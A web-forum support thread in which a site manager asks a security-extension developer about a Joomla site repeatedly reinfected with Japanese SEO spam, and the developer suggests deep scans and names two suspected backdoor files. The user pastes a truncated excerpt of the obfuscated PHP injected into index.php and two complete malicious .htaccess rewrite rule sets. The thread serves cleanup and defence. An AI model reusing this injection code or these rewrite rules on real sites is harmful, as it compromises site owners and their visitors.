Site keeps getting infected even with SecurityCheck Pro

  • shibumi
  • Topic Author
  • Offline
  • Premium Member
  • Premium Member
More
6 years 1 month ago #4461 by shibumi
I have a site I manage that I took over because it was hacked. I cleaned up to my knowledge all of the malicious code, even moved the site to a different server. The original "malware" infection is gone, but now, the root index.php keeps getting injected with code that loads a japanese content webpage. The index.php file I have made read only (0444) and yet it is still getting injected with the malicious code and file permissions are changed to 0644. I clean it, chmod it back to 0444 and a day or two later it is back again, and file permissions back to 0644. How do I finally get rid of this little bugger?

Please Log in or Create an account to join the conversation.

More
6 years 1 month ago #4462 by Jose
Hi Jeff,

Last week I cleaned an infection like yours; the site was infected again and again because there were many backdoors into it. If cybercrooks put a backdoor in the site they will be able to bypass the firewall; we must not forget that SCP is a Web Application Firewall (accesses to backdoors are done directly and not following the Joomla route mechanism, so there is no attack).

A few questions?

- Is the malware scanner configured to scan the entire filesystem (timeline = 10000 and deep scan enabled)?

- Is the file itegrity feature alerting you of the modified file?

Regards,
Jose

Please Log in or Create an account to join the conversation.

  • shibumi
  • Topic Author
  • Offline
  • Premium Member
  • Premium Member
More
6 years 1 month ago #4480 by shibumi
Hi Jose,

I tried your suggestions and ran a deep scan last night, and it did find Blackhat SEO Spam, I cleaned up the files, and once again this evening this code was injected at the top of the root index.php file:
Code:
@set_time_limit(0); $xmlname = 'mapss.xml'; $jdir = ''; $smuri_tmp = smrequest_uri(); if($smuri_tmp==''){ $smuri_tmp='/'; } $smuri = base64_encode($smuri_tmp); $dt = 0; function smrequest_uri(){ if (isset($_SERVER['REQUEST_URI'])){ $smuri = $_SERVER['REQUEST_URI']; }else{ if(isset($_SERVER['argv'])){ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; }else{ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $smuri; } $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO .... more lines of code .... MDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));

Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.

This site, when they originally contacted me for help, was infected with over 5000 malicious html files in various added to their server which had been all removed. I would do a complete re-install of their site from scratch, but not sure if the client has copies of all their paid extensions/templates as I did not do the original design, and not sure of the original designer is still around since they contacted me for help.

I attached the export of the latest deep scan

File Attachment:

File Name: malwaresca...0317.zip
File Size:6 KB

Thanks,

Jeff
Attachments:

Please Log in or Create an account to join the conversation.

More
6 years 1 month ago #4481 by Jose
Hi Jeff,

Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.


This is really odd; even a single character modified changes the hash value and you should be alerted...

I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.

Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.

Regards,
Jose

Please Log in or Create an account to join the conversation.

  • shibumi
  • Topic Author
  • Offline
  • Premium Member
  • Premium Member
More
6 years 4 weeks ago #4501 by shibumi
I tried to post the other day, but kept giving me an error, then could not even access your site for a while...

Webmaster wrote: Hi Jeff,

Every time it is injected, there is no Last Modified time stamp change to the file, except for when I remove the above code, and save the file, and then chmod it to 0444. the only thing that is different that indicates the file has been injected again, is the file permissions have changed back to 0644.


This is really odd; even a single character modified changes the hash value and you should be alerted...


The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)

Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday:
Code:
RewriteEngine On RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L] RewriteBase / RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule . /index.php [L]
or this code:
Code:
RewriteEngine On RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^[a-zA-Z0-9]{3}([a-zA-Z0-9]{5,19})/([0-9]{1,7}).html$ index.php?tempweb=$1&smid=$2 [L] RewriteBase / RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^([0-9]+)\/([^\d\/]+)\/([0-9]+)_(.*)..*$ ?$2$3=$1&%{QUERY_STRING}[L] RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*$ ?$2$1=$3&%{QUERY_STRING}[L] RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).[0-9]+,[0-9]+.[0-9]+,[0-9]+.*\/.*=![0-9]+.*[0-9]+![0-9]+.*[0-9]+![0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\:[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*\?.*=.*-JP$ ?$2$1=$3&%{QUERY_STRING}[L] RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^(.*)\/([^\d\/]+)\/([0-9]+)\/([0-9]+)\/.*\/.*\/.*\/.*..*$ ?$2$3=$4&%{QUERY_STRING}[L] RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteCond %{REQUEST_URI} !^/[0-9]+\..+\.cpaneldcv$ RewriteCond %{REQUEST_URI} !^/[A-F0-9]{32}\.txt(?:\ Comodo\ DCV)?$ RewriteRule . /index.php [L]

Webmaster wrote: I have checked the zipped file attached and I think still there are some malicious files (I should get the files to be fully sure); check the file /libraries/joomla/application/cache-66e.php and /media/system/images/thumb.php. I think those files are upload forms, so hacker can use them to upload new backdoors.


I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...

Webmaster wrote: Also remember I clean infected websites; if you need help ask me for a quotation. Maybe you can clean the website instead a complete re-install.

Regards,
Jose

Please Log in or Create an account to join the conversation.

More
6 years 4 weeks ago #4502 by Jose
Hi Jeff,

I tried to post the other day, but kept giving me an error, then could not even access your site for a while...

Yes, I did some improvements in the site. I apologize about that.

The only time the timestamp changes is when I remove the code and save the file.
My last file integrity scan showed 3 modified files: .htaccess (2017-05-07 03:23:15), error_log (2017-05-07 08:24:50) and index.php (2017-05-07 08:21:18)

Maybe hackers change the timestamp, but even if this happens the hash value should change and the extension should warn you.

Another interesting thing, is my .htaccess file is getting wiped and overwritten with the following code at 5:23am everyday

I think this is an automated task of your hosting provider; please, read this forum entry

I deleted the two files you mentioned, they were definitely malicious coded files, and the Japanese content injection seemed to be gone, until today, it came back...

Or your website or the server is still infected; do you have a shared hosting or a dedicated server?

Regards,
Jose

Please Log in or Create an account to join the conversation.

Time to create page: 0.326 seconds